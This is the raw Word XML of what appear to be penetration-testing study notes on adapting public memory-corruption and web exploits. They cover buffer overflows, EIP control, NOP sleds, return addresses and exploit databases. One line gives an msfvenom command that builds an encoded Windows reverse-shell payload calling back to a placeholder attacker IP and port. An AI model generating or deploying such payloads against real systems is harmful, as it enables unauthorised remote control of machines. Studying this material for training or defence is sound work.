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E4F" w:rsidRDefault="00AC5DA9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC5DA9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fixing Memory Corruption Exploits</w:t>
      </w:r>
      <w:r w:rsidR="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Overview and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>considerations :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Create a large buffer to trigger the overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Take control of EIP by overwriting a return address on the stack by padding the large buffer with an appropriate offset.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Include a chosen payload in the buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>prepended</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> by an optional NOP sled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Choose a correct return address instruction such as JMP ESP (or different register) in order to redirect the execution flow into our payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Additionally, as we fix the exploit, depending on the nature of the vulnerability, we may need to modify elements of the deployed buffer to suit our target such as file paths, IP addresses and ports, URLs, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>If these modifications alter our offset, we must adjust the buffer length to ensure we overwrite the return address with the desired bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E24EC" w:rsidRDefault="001E24EC" w:rsidP="001E24EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E24EC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Although we could trust that the return address used in the exploit is correct, the more responsible alternative is to find the return address ourselves, especially if the one used is not part of the vulnerable application or its DLLs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Locating Public </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The Exploit Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SecurityFocus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploit Archives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Packet Storm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the Return </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The first, and most recommended option, is to recreate the target environment locally and use a debugger to determine this address. This is the process we used when we developed the original exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> we needed a return address for a JMP ESP instruction on Windows Server 2003 SP2, we could look for it in public exploits leveraging different vulnerabilities targeting that operating system. This method is less reliable and can vary widely depending on the protections the operating system has installed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00824FDA" w:rsidRDefault="00824FDA" w:rsidP="00824FDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">If we have access to our target as an unprivileged user and want to run an exploit that will elevate our privileges, we can copy the DLLs that we are interested into our attack machine and use various tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>disassemblers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> or even msfpescan384 from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00824FDA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework to obtain a reliable return address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D34B84" w:rsidRDefault="00D34B84" w:rsidP="00D34B84">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34B84">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D34B84">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00D34B84" w:rsidRDefault="001F7594" w:rsidP="00D34B84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">If the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> start with 0x90 then that means that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Slide is used.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="00D34B84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=IP LPORT=PORT</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> EXITFUNC= thread -f c –e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -b "&lt;find-bad-chars-using-debugger&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Changing the Overflow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001F7594">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Buffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00EF00D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>http://www.cplusplus.com/reference/cstdlib/malloc/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00EF00D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>http://www.cplusplus.com/reference/cstring/memset/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00EF00D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>http://www.cplusplus.com/reference/cstring/strcpy/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00EF00D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
          </w:rPr>
          <w:t>http://www.cplusplus.com/reference/cstring/strcat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="001F7594" w:rsidP="001F7594">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FIXING WEB </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>EXPLOITS :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="001F7594" w:rsidRDefault="008136BA" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Does it initiate an HTTP or HTTPS connection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="001F7594">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Does it access a web application specific path or route</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Does the exploit leverage a pre-authentication vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>If not, how does the exploit authenticate to the web application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">How are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> GET or POST requests crafted to trigger and exploit the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Does it rely on default application settings (such as the web path of the application) that may have been changed after installation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Will oddities such as self-signed certificates disrupt the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>In addition, we must remember that public web application exploits do not take into account additional protections such as .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008136BA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>htacces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008136BA" w:rsidRPr="008136BA" w:rsidRDefault="008136BA" w:rsidP="008136BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC5DA9" w:rsidRPr="001E24EC" w:rsidRDefault="00AC5DA9" w:rsidP="001E24EC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AC5DA9" w:rsidRPr="001E24EC" w:rsidSect="00285E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16E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7806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E0BD4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D302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87BA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B682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76DA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53C2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656B8E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F560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F12EE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="41605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DF51FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5128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5DA9"/>
    <w:rsid w:val="001E24EC"/>
    <w:rsid w:val="001F7594"/>
    <w:rsid w:val="00285E4F"/>
    <w:rsid w:val="00664304"/>
    <w:rsid w:val="008136BA"/>
    <w:rsid w:val="00824FDA"/>
    <w:rsid w:val="00AC5DA9"/>
    <w:rsid w:val="00C217E3"/>
    <w:rsid w:val="00D34B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DA9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F75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string/strcat/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cplusplus.com/reference/cstring/strc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reference/cstring/memset/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cplusplus.com/reference/cstdlib/mall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2020-04-12T20:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-15T22:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>